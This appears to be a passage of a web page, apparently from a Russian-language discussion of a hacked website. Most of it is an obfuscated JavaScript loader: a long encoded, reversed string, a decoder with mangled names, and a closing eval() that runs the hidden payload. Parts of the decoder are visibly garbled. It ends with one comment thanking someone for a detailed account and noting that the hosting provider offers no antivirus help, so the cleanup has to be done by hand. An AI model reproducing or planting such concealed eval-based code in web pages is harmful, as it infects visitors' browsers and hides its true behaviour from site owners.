JxcGc1N0Nl02c0N0Nlg2cvR3Q3USbpR3Q3USasVGdDdTJv12Q3UiYtl3cDdTJoB3cDdTJ552bzN0NlIXYtN3Q3UCbh12cDdTJtVWazN0NlUWazN0NlIXYoN3Q3UCanN3Q3USayV2cDdTJk5WZzN0NlMWZzN0Nlg2YzN0NlknbhN3Q3UyctF2cDdTJldWYzN0NlAXY3F3Q3UyalRXcDdTJ49mcwN0NlQncvB3Q3UyY1xGcDdTJ5FGbwN0NlwWaoB3Q3UyZ4RGcDdTJ05WYwN0NlEmbhB3Q3USbsFGcDdTJ2dHcvN0Nlk2av52Q3UCd3VmbDdTJjVmbDdTJwJ2dtN0Nl8Gdv12Q3UCdv12Q3USai9WbDdTJmVWbtN0NlMHdp12Q3Uyb4FWbDdTJpVXYtN0NlU2ZsN0Nl8mblx2Q3USaqV2aDdTJpRGZrN0NlM3Zpp2Q3USY2FmaDdTJxFGcpN0Nl8mbul2Q3UCdwlGaDdTJjlmclN0Nl82YvR2Q3UyZuFGZDdTJDdTJk12YDdTJDdTJjRGbjN0NlwGblN2Q3UydlJnYDdTJ6FGbiN0NlMWYsJ2Q3UCZylmYDdTJx5WZiN0Nl4WY2F2Q3USZ0NXYDdTJpRWdhN0NlM0Nlk2btF2Q3UyQ3USYjxWYDdTJ2FGbhN0NlM0NlM0NlM3YhN0Nlg2Y0FWbDdTJ05WZnFkclNXdDdTJy9GdhdWa2FmbDdTJyFmdDdTJwV3Q3USYkh3Q3Uydul2dDdTJwF2dDdTJwRWatN0NlUGbpJ2btNXaDdTJnx2NyUyQyUiMyEzQyUiM2MkMlcjMlQ0NlIjMlgVMyITJENTJXFjLWFjLVFjQ3USOyUSM4ITJUFjQzUSOyUSavkjMlMVM4ITJDdTJ5ITJSFDOyUyQ3USOyUSUx4CUxgjMlM0NlkjMl8UM4ITJDdTJ5ITJOFDOyUyQ3USOyUSTxgjMlM0NlkjMlwUM4ITJDdTJ5ITJLFDOyUyQ3USOyUiSxgjMlM0NlkjMlkUM4ITJDdTJ5ITJzgjMlM0NlkjMlIDOyUyQ3USOyUCSxgjMlM0NlkjMlcUM4ITJDdTJ5ITJGFDOyUyQ3USOyUSRxgjMlM0NlkjMlQUMuMUM4ITJDdTJ5ITJCFjL2gjMlM0NlkjMlEUMuYDOyUyQ3USOyUSL1gjMlM0NlkjMlUDOyUyQ3USOyUCN4ITJDdTJ5ITJ0gjMlM0NlkjMloXM4ITJDdTJ5ITJ5FDOyUyQ3USOyUCexgjMlM0NlkjMlcXM4ITJDdTJ5ITJ2FDOyUyQ3USOyUSLzgjMlM0NlkjMlUXM4ITJDdTJ5ITJ0FDOyUyQ3USOyUidtMXM4ITJDdTJ5ITJyFDOyUyQ3USOyUScxgjMlM0NlkjMl0CcxgjMlM0NlkjMl8WM4ITJDdTJ5ITJt4WM4ITJDdTJ5ITJtFDOyUyQ3USOyUCbx0Cd4ITJDdTJ5ITJrFDOyUyQ3USOyUSLqFDOyUyQ3USOyUSaxgjMlM0NlkjMlgWM4ITJDdTJ5ITJnFDOyUyQ3USOyUiZxgjMlM0NlkjMl0SZxgjMlM0NlkjMlQWM4ITJDdTJ5ITJtMWM4ITJDdTJ5ITJiFDOyUyQ3USOyUSYxgjMlM0NlkjMl0SOxgjMlM0NlkjMl0COxgjMlM0NlkjMlcTM4ITJDdTJ5ITJ2EDOyUyQ3USOyUSNxgjMlM0NlkjMlQTM4ITJDdTJ5ITJzEDOyUyQ3USOyUiMxgjMlM0NlkjMlETM4ITJDdTJ5ITJwEDOyUyQ3USOyUiW4ITJDdTJ5ITJZhjMlM0NlkjMlgFOyUyQ3USOyUyV4ITJDdTJ5ITJWhjMlM0NlkjMlUFOyUyQ3USOyUCV4ITJDdTJ5ITJThjMlM0NlkjMlIFOyUyQ3USOyUSLRhjMlM0NlkjMlAFOyUyQ3USOyUyT4ITJDdTJ5ITJt4EOyUyQ3USOyUST4ITJDdTJ5ITJMhjMlM0NlkjMlsEOyUyQ3USOyUiM4ITJDdTJ5ITJKhjMlM0NlkjMlkEOyUyQ3USOyUSLIhjMlM0NlkjMlcWLwgjMlM0NlkjMlQWLwgjMlM0NlkjMlMWLwgjMlM0NlkjMlcEOyUyQ3USOyUiR4ITJDdTJ5ITJFhjMlM0NlkjMlQEOyUyQ3USOyUyQ4ITJDdTJ5ITJChjMlM0NlkjMlEEOyUyQ3USOyUie4ITJDdTJ5ITJ5hjMlM0NlkjMlgHOyUyQ3USOyUyd4ITJDdTJ5ITJtUHOyUyQ3USOyUyc4ITJDdTJ5ITJyhjMlM0NlkjMlEHOyUyQ3USOyUCc4ITJDdTJ5ITJvhjMlM0NlkjMl4GOyUyQ3USOyUSb4ITJDdTJ5ITJshjMlM0NlkjMlsGOyUyQ3USOyUia4ITJDdTJ5ITJohjMlM0NlkjMlYGOyUyQ3USOyUSZ4ITJDdTJ5ITJihjMl8COyUSYukjL4Q0MlEDMyUyN3ITJ4ITJEdTJwBjMl4mc1RXZyJ0MlkjMlQUNlMmQ1UyaDJTJ5ITJ3ITJndjMlMkMlcjMlI2Q1UyQ1UyNyUyK5ITJjhjMlU2K3ITJiNUNlMUNlcjMlgjMlAHeFdWZSBjMlcXZuhjMlU2YhxGclJnLwR0MlAXOyUCR1UyYCVTJrhjMlYWa5ITJt0yY4ITJlxWaodnQzUCR3USMENTJjJ0MlQ0NlcjMlsydDVTJDVTJ3ITJuJXd0VmcCdTJ5ITJ4ITJu9Wa0Nmb1ZGRzUSZCNTJEVTJEdTJEVTJlJUNlIHMyUibyVHdlJnQ3USOyUSZ4ITJu9Wa0Nmb1ZmQ1UCRzUyaCNTJ5ITJjhjMlU2Q3UyQ3UCR1UyYCVTJrR0MlQUNlkjMlMGOyUSZCVTJyljMl0SLjhjMlUGbph2dCdTJ5ITJ5ITJn5WayR3UDJTJvUUNl8COyUSZjFGbwVmcucjMlcjMlEjMlgjMlYWaCNTJEdTJ5ITJ5ITJ2MDOyUyZulmc0N1b05yYBNTJ5ITJ5IzKjhjMlUGZvNkchh2Qt9mcm5yZulmc0NlRzUSNzU0MlkjMlEWNyUyYENTJjhjMlgjMlsSOyUSOyUSOyUSYvMGOyUCdulUZzJXYwhjMlUWQzUyNyUyNyUiRzUSYDNTJjhjMl4mc1RXZyJ0NlkjMlMGOyUibvlGdj5WdmR0MlUmQ3USOyUicDJTJlNkMls2QyUyYDJTJhNkMlAHOyUibvlGdj5WdmhjMlwWY2VWRzUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd';var _0x84de=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /=","","charAt","indexOf","fromCharCode","length"];function lI1(data){var I11lOI=_0x84de[0];var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc=_0x84de[1];do{h1=I11lOI[_0x84de[3]](data[_0x84de[2]](i ));h2=I11lOI[_0x84de[3]](data[_0x84de[2]](i ));h3=I11lOI[_0x84de[3]](data[_0x84de[2]](i ));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i ));bits=h1<<18|h2<<12|h3<>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc =String[_0x84de[4]](o1);} else {if(h4==64){enc =String[_0x84de[4]](o1,o2);} else {enc =String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i=0;i--){ret =string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));
Большое спасибо за подробный рассказ. Жаль, у хостинг-провайдера нет услуг по антивирусному обеспечению(( придется руками.